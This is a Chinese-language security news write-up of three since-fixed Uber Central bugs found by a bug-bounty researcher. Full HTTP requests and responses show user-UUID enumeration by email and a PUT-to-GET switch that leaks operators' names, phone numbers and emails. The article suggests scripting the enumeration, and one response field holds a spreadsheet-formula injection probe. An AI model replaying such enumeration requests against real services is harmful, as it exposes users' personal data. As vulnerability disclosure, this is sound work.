Uber修复三个漏洞,白帽子获数千美金奖励(含漏洞分析)
安全专家Kevin Roh在Uber的在线APP Uber Central中发现三个漏洞,可造成用户数据泄露。Uber及时修复了这三个漏洞,并在Uber的漏洞赏金计划下奖励Kevin Roh数千美金。
Uber Central
Uber Central服务于今年7月推出,这款在线APP允许企业同时为多位客户量身定制网约车,从预约、管理到支付实施全方位监控。
Uber Central在使用时,可以让每个用户的单一账户在同一时间同时管理多项出行任务,并且可以对Uber中提供的车辆服务(比如UberX或UberBlack)进行选择。除了App之外,Uber Central也推出了浏览器的版本,企业可以通过浏览器界面一次呼叫多台Uber车辆,并且Uber Central支持短信发送旅途信息,以此来顾全没有使用智能手机的顾客。
三个漏洞
0×01 通过邮箱地址枚举userUUID
由于Uber Central管理员要将一个已注册的用户升级为操着者(通常是企业员工)只能通过其注册邮箱地址。
因此他构造了一个简单的服务请求:
POST /admin/api/organizations/[organizationUUID]/operators HTTP/1.1
Host: central.uber.com
Connection: close
Content-Length: 40
Accept: application/json
Origin: https://central.uber.com
x-csrf-token: XXXX
x-uber-origin: web-central-admin
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Type: application/json
Referer: https://central.uber.com/admin/locations
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
Cookie: _ua=XXXX
{"operatorEmail":"r****@unlv.nevada.edu"}
在服务请求中,如果该邮箱已经被使用,那么我们就可以看到该用户的UUID
服务器回应:
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Sep 2016 01:12:15 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
x-csrf-token: XXXX
Set-Cookie: web-central-admin:sess=fNlg1atG-0-XXXX path=/; expires=Tue, 06 Sep 2016 00:40:29 GMT; httponly
X-Uber-App: web-central-admin
Strict-Transport-Security: max-age=0
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=2592000
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=0
Content-Length: 348
{"data":{"operatorEmail":"r****@unlv.nevada.edu","organizationUuid":"[organizationUUID]","userUuid":"72225a84-53c4-4766-9ca1-6eec06cbaa13"},"createOperator":{"uuid":"9987c0ca-0894-4992-810b-0da64b6a53fc","userUUID":"906d29c8-7b17-4e90-900e-1af72e1c72a6","firstName":null,"lastName":null,"email":null,
"phoneNumber":null,"branches":null}}
得到了邮箱为r**@unlv.nevada.edu的用户,他的UUID是906d29c8-7b17-4e90-900e-1af72e1c72a6
攻击者可以编写一个简单的脚本,尝试“operationEmail”参数所有可能的值,枚举出用户的邮箱以及UUID。
0×02 通过GET请求枚举userUUID
第二个漏洞和第一个的漏洞产生的效果相同,不同之处就是将POST请求改为GET请求。
GET请求:
GET /admin/api/organizations/[organizationUUID]/operators HTTP/1.1
Host: central.uber.com
Connection: close
Content-Length: 34
Origin: https://central.uber.com
x-csrf-token: XXXX
x-uber-origin: web-central-admin
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36
Content-Type: application/json
Accept: application/json
Referer: https://central.uber.com/admin/locations
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
Cookie: _ua=XXXX
{"operatorEmail":"test2@test.com"}
服务器回应:
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 18 Oct 2016 22:44:58 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Set-Cookie: web-central-admin:sess=XXXX
X-Uber-App: web-central-admin
Strict-Transport-Security: max-age=0
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=2592000
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=0
Content-Length: 2801
{"data":{"organizationUuid":"[organizationUUID]","userUuid":"72225a84-53c4-4766-9ca1-6eec06cbaa13"},"operatorsForOrg":{"organization":{"uuid":"[organizationUUID]","name":"rohk","u4bUUID":null,"businessType":"Hospitality","estimatedDailyTrips":"500+","estimatedBranchCount":"1-5","state":"APPROVED"},"operators":{"688f8c6e-e323-4750-97b4-86656a8a2644":{"uuid":"688f8c6e-e323-4750-97b4-86656a8a2644","userUUID":"72225a84-53c4-4766-9ca1-6eec06cbaa13","firstName":"KEVIN","lastName":"ROH","email":"rohkroh@gmail.com","phoneNumber":"XXXX"},"e13a4bd3-21e4-4dae-b1cc-84b4e6de7405":{"uuid":"e13a4bd3-21e4-4dae-b1cc-84b4e6de7405","userUUID":"59a95100-5be4-4df8-a6e8-a180ec29036e","firstName":null,"lastName":null,"email":"p***@unlv.nevada.edu","phoneNumber":null},"276c9b65-7d85-4500-bc62-daf9a3d211e4":{"uuid":"276c9b65-7d85-4500-bc62-daf9a3d211e4","userUUID":"de483ca6-43bf-4930-bfe3-e3312d1fe478","firstName":null,"lastName":null,"email":"ch*****@gmail.com","phoneNumber":null},"c449f804-b905-4cfb-aa73-9c1e36e1512a":{"uuid":"c449f804-b905-4cfb-aa73-9c1e36e1512a","userUUID":"8de8282e-0d11-4d9d-938b-fbd19b826703","firstName":null,"lastName":null,"email":"test@test.com","phoneNumber":null},"f198e728-f4a2-487a-a6ee-3c9e4e4621b2":{"uuid":"f198e728-f4a2-487a-a6ee-3c9e4e4621b2","userUUID":"e71f3f9f-784c-4cba-9d76-d4f110e090e2","firstName":null,"lastName":null,"email":"test2@test.com","phoneNumber":null},"fba45580-c36e-460b-a55d-198f8bd82d6e":{"uuid":"fba45580-c36e-460b-a55d-198f8bd82d6e","userUUID":"d9f142b2-1f91-49ae-a7a7-feadcdfa1375","firstName":null,"lastName":null,"email":"em***@outlook.com","phoneNumber":null},"3a3b2393-7f89-45b7-a558-98b8f117fe46":{"uuid":"3a3b2393-7f89-45b7-a558-98b8f117fe46","userUUID":"5e699c04-d453-4dab-9e32-90c6a610c4c3","firstName":null,"lastName":null,"email":"kr****@live.com","phoneNumber":null},"9987c0ca-0894-4992-810b-0da64b6a53fc":{"uuid":"9987c0ca-0894-4992-810b-0da64b6a53fc","userUUID":"906d29c8-7b17-4e90-900e-1af72e1c72a6","firstName":"test","lastName":"account","email":"r****@unlv.nevada.edu","phoneNumber":"XXXX"}},"operatorsLinkStatusAndRoles":{"688f8c6e-e323-4750-97b4-86656a8a2644":{"linkStatus":"LINKED","roles":["ADMIN","USER"]},"e13a4bd3-21e4-4dae-b1cc-84b4e6de7405":{"linkStatus":"PENDING","roles":["USER"]},"276c9b65-7d85-4500-bc62-daf9a3d211e4":{"linkStatus":"PENDING","roles":["USER"]},"c449f804-b905-4cfb-aa73-9c1e36e1512a":{"linkStatus":"PENDING","roles":["USER"]},"f198e728-f4a2-487a-a6ee-3c9e4e4621b2":{"linkStatus":"PENDING","roles":["USER"]},"fba45580-c36e-460b-a55d-198f8bd82d6e":{"linkStatus":"PENDING","roles":["USER"]},"3a3b2393-7f89-45b7-a558-98b8f117fe46":{"linkStatus":"PENDING","roles":["USER"]},"9987c0ca-0894-4992-810b-0da64b6a53fc":{"linkStatus":"LINKED","roles":["USER"]}}}}
Uber修复了这个漏洞,邮箱地址不再与用户的userUUID相关联,但是每当你发出GET请求时,依然能得到一个随机的userUUID(窃笑)。
0×03 获取更多的信息
在获取了大量的可用邮箱及其userUUID之后,就可以通过GET HTTP的方式尝试获取更多的数据。一旦用户已经被升级为操作者,也就是那些已经注册了Uber Central的企业用户,他们的信息就存在被泄露的威胁,包括姓名、电话号码、邮箱、userUUID。
原始的HTTP路径的是PUT,如果当你能够把PUT改为GET的话,更多的信息将暴露出来。
GET请求:
GET /admin/api/organizations/[organizationUUID]/branches/8c744451-3e3e-43c3-aaaf-2bf52feab19c/operators HTTP/1.1
Host: central.uber.com
Connection: close
Content-Length: 331
Accept: application/json
Origin: https://central.uber.com
x-csrf-token: XXXX
x-uber-origin: web-central-admin
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36
Content-Type: application/json
Referer: https://central.uber.com/admin/locations
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8
Cookie: _ua=XXXX
{"operatorUuids":["9987c0ca-0894-4992-810b-0da64b6a53fc","688f8c6e-e323-4750-97b4-86656a8a2644","e13a4bd3-21e4-4dae-b1cc-84b4e6de7405","c449f804-b905-4cfb-aa73-9c1e36e1512a","fba45580-c36e-460b-a55d-198f8bd82d6e","3a3b2393-7f89-45b7-a558-98b8f117fe46","276c9b65-7d85-4500-bc62-daf9a3d211e4","f198e728-f4a2-487a-a6ee-3c9e4e4621b2"]}
服务器回应:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 21 Oct 2016 00:43:48 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Set-Cookie: web-central-admin:XXXX
X-Uber-App: web-central-admin
Strict-Transport-Security: max-age=0
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=2592000
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=0
Content-Length: 2851
{"data":{"branchUuid":"8c744451-3e3e-43c3-aaaf-2bf52feab19c","userUuid":"72225a84-53c4-4766-9ca1-6eec06cbaa13"},"operatorsForOrg":{"branch":{"uuid":"8c744451-3e3e-43c3-aaaf-2bf52feab19c","name":"","phoneNumber":"+XXXX","address":"XXXX","email":""},"operators":{"688f8c6e-e323-4750-97b4-86656a8a2644":{"uuid":"688f8c6e-e323-4750-97b4-86656a8a2644","userUUID":"72225a84-53c4-4766-9ca1-6eec06cbaa13","firstName":"KEVIN","lastName":"ROH","email":"rohkroh@gmail.com","phoneNumber":"XXXX"},"e13a4bd3-21e4-4dae-b1cc-84b4e6de7405":{"uuid":"e13a4bd3-21e4-4dae-b1cc-84b4e6de7405","userUUID":"59a95100-5be4-4df8-a6e8-a180ec29036e","firstName":"Ted","lastName":"Pele","email":"p***@unlv.nevada.edu","phoneNumber":null},"9987c0ca-0894-4992-810b-0da64b6a53fc":{"uuid":"9987c0ca-0894-4992-810b-0da64b6a53fc","userUUID":"906d29c8-7b17-4e90-900e-1af72e1c72a6","firstName":"test","lastName":"account","email":"r****@unlv.nevada.edu","phoneNumber":"XXXX"},"c449f804-b905-4cfb-aa73-9c1e36e1512a":{"uuid":"c449f804-b905-4cfb-aa73-9c1e36e1512a","userUUID":"8de8282e-0d11-4d9d-938b-fbd19b826703","firstName":"AndrewTEST","lastName":"Test","email":"test@test.com","phoneNumber":"XXXX"},"f198e728-f4a2-487a-a6ee-3c9e4e4621b2":{"uuid":"f198e728-f4a2-487a-a6ee-3c9e4e4621b2","userUUID":"e71f3f9f-784c-4cba-9d76-d4f110e090e2","firstName":"uber","lastName":"uber","email":"test2@test.com","phoneNumber":"XXXX"},"fba45580-c36e-460b-a55d-198f8bd82d6e":{"uuid":"fba45580-c36e-460b-a55d-198f8bd82d6e","userUUID":"d9f142b2-1f91-49ae-a7a7-feadcdfa1375","firstName":"h1","lastName":"emckai","email":"em****@outlook.com","phoneNumber":null},"3a3b2393-7f89-45b7-a558-98b8f117fe46":{"uuid":"3a3b2393-7f89-45b7-a558-98b8f117fe46","userUUID":"5e699c04-d453-4dab-9e32-90c6a610c4c3","firstName":"=HYPERLINK(\"http://google.com\")","lastName":"","email":"kr******@live.com","phoneNumber":null},"276c9b65-7d85-4500-bc62-daf9a3d211e4":{"uuid":"276c9b65-7d85-4500-bc62-daf9a3d211e4","userUUID":"de483ca6-43bf-4930-bfe3-e3312d1fe478","firstName":"XXXXX","lastName":"XXXXX","email":"ch******@gmail.com","phoneNumber":"XXXX"}},"operatorsLinkStatusAndRoles":{"688f8c6e-e323-4750-97b4-86656a8a2644":{"linkStatus":"LINKED","roles":["ADMIN","USER"]},"e13a4bd3-21e4-4dae-b1cc-84b4e6de7405":{"linkStatus":"PENDING","roles":["USER"]},"9987c0ca-0894-4992-810b-0da64b6a53fc":{"linkStatus":"LINKED","roles":["USER"]},"c449f804-b905-4cfb-aa73-9c1e36e1512a":{"linkStatus":"PENDING","roles":["USER"]},"f198e728-f4a2-487a-a6ee-3c9e4e4621b2":{"linkStatus":"PENDING","roles":["USER"]},"fba45580-c36e-460b-a55d-198f8bd82d6e":{"linkStatus":"PENDING","roles":["USER"]},"3a3b2393-7f89-45b7-a558-98b8f117fe46":{"linkStatus":"PENDING","roles":["USER"]},"276c9b65-7d85-4500-bc62-daf9a3d211e4":{"linkStatus":"PENDING","roles":["USER"]}}}}
上面的回应中显示了几个用户的姓、名、电话号码、邮箱地址以及他们的userUUID。
Uber修复了这个漏洞,firstName,lastName,phoneNumber的位置都被替换成了NULL,但是每当你发出GET请求时,依然能得到一个随机的userUUID。
相关文章
图文推荐
- 文章
- 推荐
- 热门新闻